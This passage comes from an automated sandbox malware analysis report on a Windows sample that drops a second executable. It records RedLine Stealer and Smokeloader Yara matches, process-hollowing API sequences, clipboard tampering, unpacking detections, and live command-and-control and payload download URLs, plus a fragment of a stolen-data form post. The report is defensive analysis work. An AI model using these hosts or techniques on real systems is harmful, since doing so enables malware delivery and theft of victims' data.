name="hwid"B2BAB85921823381591466------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="build"default9_cap------DAECFIJDAAAKECBFCGHI--
                    Source: VAIIBIHmtT.exe, VAIIBIHmtT.exe, 00000001.00000002.4169795931.0000000000775000.00000004.00000020.00020000.00000000.sdmp, VAIIBIHmtT.exe, 00000001.00000003.4009441376.0000000000774000.00000004.00000020.00020000.00000000.sdmp, VAIIBIHmtT.exe, 00000001.00000002.4169669321.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe
                    Source: VAIIBIHmtT.exe, 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE
                    Source: VAIIBIHmtT.exe, 00000001.00000002.4169795931.0000000000775000.00000004.00000020.00020000.00000000.sdmp, VAIIBIHmtT.exe, 00000001.00000003.4009441376.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe8
                    Source: 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp, 81C9.tmp.exe, 00000002.00000002.2008489449.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177
                    Source: 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177)
                    Source: 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp, 81C9.tmp.exe, 00000002.00000002.2008550485.000000000086C000.00000004.00000020.00020000.00000000.sdmp, 81C9.tmp.exe, 00000002.00000002.2008550485.000000000085A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/
                    Source: 81C9.tmp.exe, 00000002.00000002.2008550485.000000000085A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/=
                    Source: 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp, 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000876000.00000004.00000020.00020000.00000000.sdmp, 81C9.tmp.exe, 00000002.00000002.2008550485.000000000085A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php
                    Source: 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpM
                    Source: 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpQ
                    Source: 81C9.tmp.exe, 00000002.00000002.2008550485.000000000085A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/ows
                    Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                    Source: VAIIBIHmtT.exe, 00000001.00000002.4169669321.0000000000736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                    Source: VAIIBIHmtT.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                    Source: VAIIBIHmtT.exe, 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                    Source: VAIIBIHmtT.exe, 00000001.00000002.4169669321.0000000000736000.00000004.00000020.00020000.00000000.sdmp, VAIIBIHmtT.exe, 00000001.00000002.4169669321.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,1_2_004016E3
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,1_2_004016E3
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,1_2_004016E3

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 00000002.00000002.2008531907.00000000007FB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.1708924923.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00740110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_00740110
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_0040C4D80_2_0040C4D8
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_0040B89C0_2_0040B89C
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_0040D5490_2_0040D549
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00404D4D0_2_00404D4D
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_0040B3580_2_0040B358
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_0040BDE00_2_0040BDE0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00403DED0_2_00403DED
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_0075706F0_2_0075706F
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_007540E50_2_007540E5
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_007681B60_2_007681B6
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_0074F3390_2_0074F339
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_007684600_2_00768460
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_0075946F0_2_0075946F
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_0076F4A00_2_0076F4A0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_0077767F0_2_0077767F
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_007687270_2_00768727
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_007548CB0_2_007548CB
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_0076F4A00_2_0076F4A0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_007689E20_2_007689E2
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00767E440_2_00767E44
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_0076DEAE0_2_0076DEAE
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00768F200_2_00768F20
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_004280421_2_00428042
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_004071D01_2_004071D0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_004373F91_2_004373F9
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_004274A41_2_004274A4
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_0042D50E1_2_0042D50E
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_004285801_2_00428580
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_004166CF1_2_004166CF
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_004137451_2_00413745
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_004278161_2_00427816
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_0040E9991_2_0040E999
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_00427AC01_2_00427AC0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_00418ACF1_2_00418ACF
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_0042EB001_2_0042EB00
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_00436CDF1_2_00436CDF
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_00427D871_2_00427D87
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_00413F2B1_2_00413F2B
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: String function: 00410740 appears 52 times
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: String function: 0040F928 appears 36 times
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: String function: 0040FDD7 appears 123 times
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: String function: 007510E0 appears 51 times
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: String function: 00750777 appears 119 times
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1188
                    Source: VAIIBIHmtT.exeBinary or memory string: OriginalFileName vs VAIIBIHmtT.exe
                    Source: VAIIBIHmtT.exe, 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs VAIIBIHmtT.exe
                    Source: VAIIBIHmtT.exeBinary or memory string: OriginalFileName vs VAIIBIHmtT.exe
                    Source: VAIIBIHmtT.exe, 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs VAIIBIHmtT.exe
                    Source: VAIIBIHmtT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000002.00000002.2008531907.00000000007FB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.1708924923.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: VAIIBIHmtT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ScreenUpdateSync[1].exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 81C9.tmp.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@6/7@1/3
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00402B10 SetLastError,SetLastError,DefineDosDeviceW,_malloc,EnumResourceNamesW,CoSuspendClassObjects,WinHttpOpen,GetDiskFreeSpaceW,OpenJobObjectW,InterlockedDecrement,_ldexp,VirtualAlloc,GetTickCount,GetTickCount,LoadLibraryA,ReadConsoleInputA,InterlockedExchange,LoadLibraryA,ReadConsoleInputA,LCMapStringW,OpenEventW,LCMapStringW,InterlockedExchange,OpenEventW,GetCurrentProcess,GetCharWidth32A,GetCurrentProcess,GetCharWidth32A,GetLastError,GetLastError,GetFileAttributesA,GetShortPathNameA,GlobalCompact,GetFileAttributesA,GetShortPathNameA,GlobalCompact,FreeEnvironmentStringsA,SetComputerNameW,InterlockedExchange,0_2_00402B10
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_005F07A6 CreateToolhelp32Snapshot,Module32First,0_2_005F07A6
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,2_2_00413720
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htmJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeMutant created: \Sessions\1\BaseNamedObjects\48rt8k8rt4rwe5rb
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7456
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeFile created: C:\Users\user\AppData\Local\Temp\81C9.tmpJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCommand line argument: {F?=0_2_00402DE0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCommand line argument: K(50_2_00402DE0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCommand line argument: .XFJ0_2_00402DE0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCommand line argument: E*O<0_2_00402DE0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCommand line argument: !,j.0_2_00402DE0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCommand line argument: \d4&0_2_00402DE0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCommand line argument: 0B0_2_00402DE0
                    Source: VAIIBIHmtT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: VAIIBIHmtT.exeReversingLabs: Detection: 50%
                    Source: unknownProcess created: C:\Users\user\Desktop\VAIIBIHmtT.exe "C:\Users\user\Desktop\VAIIBIHmtT.exe"
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeProcess created: C:\Users\user\Desktop\VAIIBIHmtT.exe "C:\Users\user\Desktop\VAIIBIHmtT.exe"
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeProcess created: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe "C:\Users\user\AppData\Local\Temp\81C9.tmp.exe"
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1188
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeProcess created: C:\Users\user\Desktop\VAIIBIHmtT.exe "C:\Users\user\Desktop\VAIIBIHmtT.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeProcess created: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe "C:\Users\user\AppData\Local\Temp\81C9.tmp.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeUnpacked PE file: 1.2.VAIIBIHmtT.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeUnpacked PE file: 2.2.81C9.tmp.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeUnpacked PE file: 1.2.VAIIBIHmtT.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeUnpacked PE file: 2.2.81C9.tmp.exe.400000.1.unpack
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00408BC5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00408BC5
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00405359 push ecx; ret 0_2_0040536C
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_005F363B push 00000003h; ret 0_2_005F363F
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_005F5C3A pushad ; ret 0_2_005F5C56
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_005F1ABE push ebx; retf 0_2_005F1AC5
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_005F1F53 push edx; retn 0010h0_2_005F1F55
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_005F5DB9 push ecx; ret 0_2_005F5DD6
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_005F31AE pushad ; ret 0_2_005F31BD
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_007780F8 push esp; retf 0_2_00778100
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00751126 push ecx; ret 0_2_00751139
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_007786F6 push esp; retf 0_2_007786F7
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00750751 push ecx; ret 0_2_00750764
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_00410786 push ecx; ret 1_2_00410799
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_0043DB97 push dword ptr [esp+ecx-75h]; iretd 1_2_0043DB9B
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_0040FDB1 push ecx; ret 1_2_0040FDC4
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0041B035 push ecx; ret 2_2_0041B048
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0040020D pushfd ; iretd 2_2_00400211
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_008005A3 push eax; ret 2_2_008005C1
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_008005B2 push eax; ret 2_2_008005C1
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_007FD5D3 push 7DD07DC0h; iretd 2_2_007FD5E4
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_007FCACD pushfd ; iretd 2_2_007FCAD0
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B3B29C push ecx; ret 2_2_00B3B2AF
